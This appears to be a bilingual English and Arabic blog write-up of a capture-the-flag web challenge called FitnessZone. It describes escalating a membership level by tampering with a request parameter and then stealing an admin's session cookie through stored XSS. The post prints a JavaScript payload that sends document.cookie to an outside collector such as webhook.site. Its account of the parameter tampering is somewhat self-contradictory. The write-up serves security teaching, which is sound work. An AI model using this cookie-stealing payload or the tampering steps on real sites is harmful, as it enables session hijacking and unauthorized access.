<h2>Challenge ovierview:</h2>

FitnessZone is a hard-level challenge with the desciption &ldquo;Your best health and wellness starts with a Fitness Zone membership. Feel amazing every day with a fitness membership that fits around your lifestyle. It is a web-based challenge that requires specific skills, including a solid understanding of the OWASP Top 10.&nbsp; In this challenge, I conducted a series of steps to exploit vulnerabilities within a web application. The goal was to escalate privileges from a Bronze-level user to Silver and, ultimately, gain access to the coveted &#39;Gold&#39; membership level, where the flag could be retrieved. This report outlines the steps taken and the vulnerabilities identified. Technical approach:

Technical approach:

I examined the source page to search for any JavaScript or comments, but it consisted solely of clear HTML/CSS with no JavaScript scripts included. During the assessment, I intercepted the registration request for the web application. In this request, I discovered a parameter named &#39;membership&#39; that appeared to dictate the user&#39;s membership level. In an attempt to upgrade my membership from &#39;Bronze&#39; to &#39;Silver,&#39; I manipulated the &#39;membership&#39; parameter value. 

However, the application promptly responded with the message, &quot;Only Bronze membership is available for now,&quot; indicating that a direct modification of membership was not allowed.

<img alt="" src="/media/blog/2024/02/18/one.png" style="height:539px; width:494px" />

Persistently, I continued my efforts by modifying the &#39;membership&#39; parameter value to &#39;Silver.&#39; This manipulation successfully granted me &#39;Silver&#39; membership status, prompting the message, &quot;You are a Silver Level User. Upgrade To Access Premium Features

<img alt="" src="/media/blog/2024/02/18/two.png" style="height:599px; width:731px" />

&nbsp;

<img alt="" src="/media/blog/2024/02/18/three.png" style="height:505px; width:566px" />

Exploring the application, I came across the &#39;Apply For Gold&#39; button. By clicking on this button, I was presented with fields for providing a name and a description for my Gold membership application.

<img alt="" src="/media/blog/2024/02/18/four.png" style="height:367px; width:485px" />

&nbsp;

XSS via CSRF Exploitation

Given the opportunity to provide a name and description and visite by admin, I identified a potential vulnerability. I suspected that the application might be susceptible to Cross-Site Scripting (XSS) attacks stored via Cross-Site Request Forgery (CSRF).

Crafting the XSS Payload

<ul>
	<li>To test my hypothesis, I created an XSS payload using JavaScript to exfiltrate the user&#39;s session cookie:</li>
</ul>

<kbd><code>```bash</code></kbd>

<kbd><code>&lt;script&gt;</code></kbd>

<kbd><code>&nbsp;&nbsp; document.write(&#39;&lt;img src=&quot;[URL]?c=&#39; + document.cookie + &#39;&quot; /&gt;&#39;);</code></kbd>

<kbd><code>&nbsp;&lt;/script&gt;</code></kbd>

<kbd><code>```</code></kbd>

<ul>
	<li>I ensured that the &#39;[URL]&#39; was set to either Burp Collaborator (for users with BurpSuite Pro) or &quot;https://webhook.site&quot; for those without BurpSuite Pro. </li>
</ul>

Payload Injection

<ul>
	<li>I proceeded to inject the crafted payload into all available fields, namely &#39;name&#39; and &#39;description,&#39; and submitted the Gold membership application.</li>
</ul>

<img alt="" src="/media/blog/2024/02/18/five.png" style="height:459px; width:390px" />

Confirmation of Successful Submission

<ul>
	<li>The application responded with the message, &#39;Request submitted successfully. Admin will take a look at it soon,&#39; indicating that the request was saved and pending review by the admin. Flag Retrieval </li>
	<li>Upon successful execution of the XSS payload, I received a callback on the chosen platform (Burp Collaborator or &quot;https://webhook.site&quot;). This callback provided access to the coveted flag.</li>
</ul>

<img alt="" src="/media/blog/2024/02/18/six.png" style="height:229px; width:680px" />

<h2>Conclusion:</h2>

This CTF challenge demonstrated the exploitation of a combination of vulnerabilities to elevate privileges and gain unauthorized access within the web application. The critical vulnerabilities identified included Inadequate input validation allowing manipulation of the &#39;membership&#39; parameter. A potential Cross-Site Scripting (XSS) vulnerability stored via Cross-Site Request Forgery (CSRF). The successful exploitation of these vulnerabilities allowed for the retrieval of the flag, highlighting the importance of robust security testing and measures in web application development. This exercise serves as a valuable reminder of the importance of addressing security flaws proactively and continuously to protect web applications against real-world attacks.

نظرة عامة على التحدي:

يعتبر FitnessZone تحديًا من الصعب تخطيه مع الوصف &quot;تبدأ صحتك ورفاهيتك الأفضل مع عضوية في Fitness Zone. اشعر بتحسن كل يوم مع عضوية للياقة البدنية تناسب نمط حياتك.&quot;&nbsp; إنه تحدي قائم على الويب يتطلب مهارات محددة ، بما في ذلك فهم جيد لأفضل 10 مشاكل في OWASP. في هذا التحدي ، قمت بتنفيذ سلسلة من الخطوات لاستغلال الثغرات داخل تطبيق ويب. كان الهدف هو تصعيد الامتيازات من مستخدم بمستوى برونزي إلى فضي وبالتالي الحصول على وصول إلى مستوى العضوية &#39;الذهبية&#39; المرغوب فيه، حيث يمكن استرجاع العلم. يوضح هذا التقرير الخطوات التي تم اتخاذها والثغرات المحددة.

<h2 dir="rtl">النهج التقني:</h2>

قمت بفحص صفحة المصدر للبحث عن أي JavaScript أو تعليقات ، ولكنها كانت تتألف فقط من HTML/CSS واضح بدون أي سكريبتات JavaScript مدرجة خلال التقييم ، قمت بالتقاط طلب التسجيل لتطبيق الويب. في هذا الطلب ، اكتشفت معلمة تسمى &#39;العضوية&#39; التي بدت كما لو كانت تحدد مستوى عضوية المستخدم.

في محاولة لرفع مستوى عضويتي من &#39;برونزية&#39; إلى &#39;فضية&#39; ، قمت بتلاعب قيمة معلمة &#39;العضوية&#39;. ومع ذلك ، رد التطبيق بسرعة بالرسالة &quot;العضوية البرونزية متاحة فقط الآن&quot; ، مشيرًا إلى أن التعديل المباشر للعضوية لم يكن مسموحًا.

<img alt="" src="/media/blog/2024/02/18/one.png" style="height:539px; width:494px" />

بصمود ، واصلت جهودي بتعديل قيمة معلمة &#39;العضوية&#39; إلى &#39;فضية&#39;. نجح هذا التلاعب في منحي حالة عضوية &#39;فضية&#39; ، مما دفع الرسالة &quot;أنت عضو فضي. قم بالترقية للوصول إلى الميزات المميزة

<img alt="" src="/media/blog/2024/02/18/two.png" style="height:599px; width:731px" />

&nbsp;

<img alt="" src="/media/blog/2024/02/18/three.png" style="height:505px; width:566px" />

أثناء استكشاف التطبيق ، وجدت زر &quot;التقدم بطلب للحصول على الذهب&quot;. بالنقر فوق هذا الزر ، تم عرض حقول لتقديم اسم ووصف لطلب عضوية الذهب.

<img alt="" src="/media/blog/2024/02/18/four.png" style="height:367px; width:485px" />

&nbsp;

XSS عبر استغلال CSRF

بناءً على الفرصة المتاحة لتقديم اسم ووصف وزيارة من قبل المسؤول ، تمكنت من تحديد ثغرة محتملة. اشتبهت في أن التطبيق قد يكون عرضة لهجمات Cross-Site Scripting (XSS) المخزنة عبر Cross-Site Request Forgery (CSRF).

صياغة حمولة XSS

لاختبار فرضيتي ، قمت بإنشاء حمولة XSS باستخدام JavaScript لسرقة ملف تعريف الجلسة للمستخدم:

```bash

&lt;script&gt;

&nbsp;&nbsp; document.write(&#39;&lt;img src=&quot;[URL]?c=&#39; + document.cookie + &#39;&quot; /&gt;&#39;);

&nbsp;&lt;/script&gt;

```

ضمنت أن &#39;[URL]&#39; تم تعيينه إما على Burp Collaborator (للمستخدمين الذين يمتلكون BurpSuite Pro) أو &quot;<a href="https://webhook.site/" target="_new">https://webhook.site</a>&quot; لأولئك الذين لا يمتلكون BurpSuite Pro.

حقن الحمولة

واصلت في حقن الحمولة المصممة في جميع الحقول المتاحة ، وهي &#39;الاسم&#39; و &#39;الوصف&#39; ، وقدمت طلب عضوية الذهب.

<img alt="" src="/media/blog/2024/02/18/five.png" style="height:459px; width:390px" />

&nbsp;

تأكيد الإرسال الناجح

رد التطبيق برسالة &quot;تم إرسال الطلب بنجاح. سيقوم المسؤول بالنظر فيه قريبًا&quot; ، مما يشير إلى أن الطلب تم حفظه وفي انتظار مراجعة من قبل المسؤول.

استرجاع العلم

بعد تنفيذ الحمولة XSS بنجاح ، تلقيت ردًا على المنصة المختارة (Burp Collaborator أو &quot;<a href="https://webhook.site/" target="_new">https://webhook.site</a>&quot;). هذا الرد قدم وصولًا إلى العلم المرغوب فيه.

<img alt="" src="/media/blog/2024/02/18/six.png" style="height:229px; width:680px" />

الاستنتاج:

أظهر هذا التحدي في CTF استغلال مزيج من الثغرات لرفع مستوى الامتيازات والحصول على وصول غير مصرح به داخل تطبيق الويب. تشمل الثغرات الحرجة المحددة: عدم كفاية التحقق من الإدخال مما يسمح بالتلاعب بمعلمة &#39;العضوية&#39;. ثغرة محتملة في Cross-Site Scripting (XSS) المخزنة عبر Cross-Site Request Forgery (CSRF). نجح استغلال هذه الثغرات في استرجاع العلم ، مما يبرز أهمية اختبار الأمان القوي والتدابير في تطوير تطبيقات الويب. يعتبر هذا التمرين تذكيرًا قيمًا بأهمية معالجة العيوب الأمنية بشكل نشط ومستمر لحماية تطبيقات الويب من هجمات العالم الحقيقي.

what-are-bug-bounties-how-do-they-work

In today's interconnected world, where technology permeates every aspect of our lives ..

شهد عالمنا المعاصر تقدماً تقنيا لم يسبق له مثيل، فقد أثرت التقنية على كل جانب من جوانب حياتنا اليومية

What Are Bug Bounties? How to Leverage Collective Power of the Hacker Community?

ماهي برامج مكافأة الثغرات و كيف لمنشأتي أن تستفيد من الباحثين الأمنيين؟

FitnessZone-Challenge

The FitnessZone challenge involved exploiting vulnerabilities in a web application to escalate user privileges and gain unauthorized access.

تضمن تحدي FitnessZone استغلال الثغرات في تطبيق ويب لتصعيد امتيازات المستخدم والحصول على وصول غير مصرح به.

FitnessZone Challenge Writeup

Fahad Khalid AL-Obaidallah

READ NEXT

What Are Bug Bounties? How to Leverage Collective Power of the Hacker Community?